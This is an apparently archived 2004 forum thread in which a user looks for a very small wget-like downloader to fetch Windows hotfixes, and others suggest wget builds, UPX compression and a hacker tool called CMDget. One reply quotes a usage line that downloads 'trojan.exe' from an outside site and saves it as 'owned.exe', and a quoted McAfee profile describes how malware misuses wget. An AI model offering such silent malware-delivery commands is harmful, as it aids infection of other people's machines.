GreenMachine Posted August 16, 2004
HELP!
Somebody on this forum (I first thought Bilou_Gateux, then Jjazz) suggested I use WGET to download the hotfixes, and posted a link to a VERY, VERY small version of WGET. This version was one used by virus/trojans, that would silently download a file, and then silently launch the program. The file size was, as I said, very, very small: under 10 Kb. The same person also posted a link to an equally small MD5 CheckSum routine, again under 5 Kb. The WGET routine also showed up in McAfee as a trojan/virus.
I've been searching for a few hours now, and I cannot find the post, the copy of the files I thought I had, or a link to these minuscule versions.
If anyone has a link to the post or the files, or would be so kind as to zip and attach the files, they will "make my day".
Anyone?
swampy Posted August 16, 2004
The smallest wget I can find weighs in at 109,736 bytes, here: http://wget.techknight.com/download.php
It's half the size of the wget I use for updating my f-prot bootCD.
GreenMachine (Author) Posted August 16, 2004
Thanks much, swampy.
The version I seem to remember (and I'm losing my mind trying to find) was wicked small. I think it had very limited functionality, but it would do just what I need. I'm sure someone posted it on the XPCREATE forum, and I'm going nuts trying to find it.
I guess it's bedtime in this northern, western hemisphere: maybe my memory/eyes/search will work better tomorrow.
Thanks again for posting, and the link.
Virindi Posted August 16, 2004
They probably did customize a version of wget, and then compressed it with UPX or something similar.
I can't find a miniature version of wget, lynx, or curl for Windows. :\ So I tested compressing it myself: http://www.interlog.com/~tcharron/wgetwin.html
wget 1.5.3: compresses to 76k with UPX. I can't find anything smaller at the moment, but I will keep an eye out.
GreenMachine (Author) Posted August 16, 2004
Thanks, Virindi. I'm beginning to wonder if that post has been deleted. I think it was near a post you did that mentioned the UPX compressed version. The one I saw was very very small: I think only a few Kbyte. Somehow that file led me to a site, and there was also a small FTP/Web server, which made me think of the Worm/Trojan aspect. This WGET version also launched the downloaded file, as an option. It also seemed to do little else, other than download: that is what I am looking for the HotFix downloader. WGET has many options, most of which I would not need. I do think it was Jjazz that had posted it. (Where are you, Jjazz? Vacation time in France?)
Thanks again for the reply, but I really do want to find that version. I guess I'll just keep bumping these posts till I get it!
sleepnmojo Posted August 16, 2004
Do you have the name of the trojan it was listed as? It may be easier to find the trojan, and pull it from there than finding it in the board.
GreenMachine (Author) Posted August 16, 2004
Sorry, I don't. I've also been googling +trojan +wget +"web server" +tutorial, in varying combinations. Checked with the AV sites, etc ... Now I'm in the process of reading every thread in this forum. Boring ...
Thanks for the suggestion!
Bilou_Gateux Posted August 17, 2004
Not a reduced wget.exe version but a hacker tool which does its job fine:
CMDget.exe - 1.5kb - Downloads a file from a website from user provided parameters (Example: CMDGet http://illmob.org/trojan.exe c:\>owned.exe)
md5.exe - 15kb - gets the md5 hash of a file
Small collection of tools I use regularly in a remote shell/cmd prompt
CMDget.exe
PM sent
GreenMachine (Author) Posted August 18, 2004
BIG THANKS go out to Bilou_Gateux for ending my 2 day quest. I was wrong, it was CMDGET that I was thinking of, not WGET.
urgan Posted August 18, 2004
Too late I guess, but found a "httpget" under 18k here. Also has a tiny sha-160 checker.
GreenMachine (Author) Posted August 18, 2004
Never too late: checking it out now.
In fact, I am leaning towards WGET at this point, for many reasons, but I was going out of my mind looking for that other one. Who said I was stubborn?
DisabledTrucker Posted August 18, 2004
The following is an excerpt from McAfee.com:
Threat Profile: Tool-WGet
Risk Assessment - Home Users: N/A - Corporate Users: N/A
Date Discovered: 8/1/2002
Date Added: 3/17/2004
Origin: Unknown
Length: Varies
Type: Program
SubType: Win32
DAT Required: 4218
Program Characteristics
This is not a virus or trojan. It is a legitimate application for retrieving files from the Internet via HTTP and FTP. The application has been misused by certain pieces of malware in order to facilitate remote downloads.
The exact file size varies (there are many different versions), and it may be packed with a PE packer (eg. UPX, Aspack). Malware that use this tool maliciously typically do so using the quiet switch, disabling screen output.
Users who would like to check for the presence of potentially unwanted programs on their system should run the command line scanner with the /PROGRAM switch.
Please note that VirusScan 7, and higher, has an option that enables users to detect this kind of program automatically (see below).
Symptoms
N/A
This is not a virus or trojan. It is a legitimate application which enables remote files to be downloaded from the Internet via HTTP or FTP.
Removal Instructions
For VirusScan 4.x users who would like to detect this program on their system, they can run the command line scanner with the /PROGRAM switch.
Click the START button
Click RUN
Type COMMAND and hit ENTER
Type: c:\progra~1\common~1\networ~1\viruss~1\4.0.xx\scan.exe c: /program /sub and hit ENTER.
Users running VirusScan 7 or later can also enable application or joke detection via the configuration option "Find potentially unwanted programs" (Advanced section - see example below), within the VirusScan GUI as shown below:
Corporate Users: This applies for the VirusScan 7 Enterprise On-Access scanner too.
Retail Users: This does not apply for the VirusScan 7 Retail On-Access scanner.
(Pictures omitted.)
HTH.
For a link to the exact place at McAfee.com: W-Get virus information.
*edit* google search for: PE Packer W-Get
Alanoll Posted August 18, 2004
Now that would be really amusing, though not for GM. Install XPcreate, and the virusscanner reports a virus. lol. Sorry, couldn't resist.
GreenMachine (Author) Posted August 18, 2004
Actually, I knew I left a copy on someone's machine, so I had them do the command line McAfee Virus Scan to find it. Just wasn't the correct version (or name). On the other hand, it did not find CMDGet ...
DisabledTrucker Posted August 18, 2004
I also found this too, http://www.msfn.org/board/index.php?act=ST&f=80&t=16094 not sure if that's what you're looking for or not, both Aaron and Bombtrack mention it. Bombtrack has the instructions for it in his post. Not sure if that's what you're looking for though or not. When you do the search use W-Get, that may help you find what you're looking for.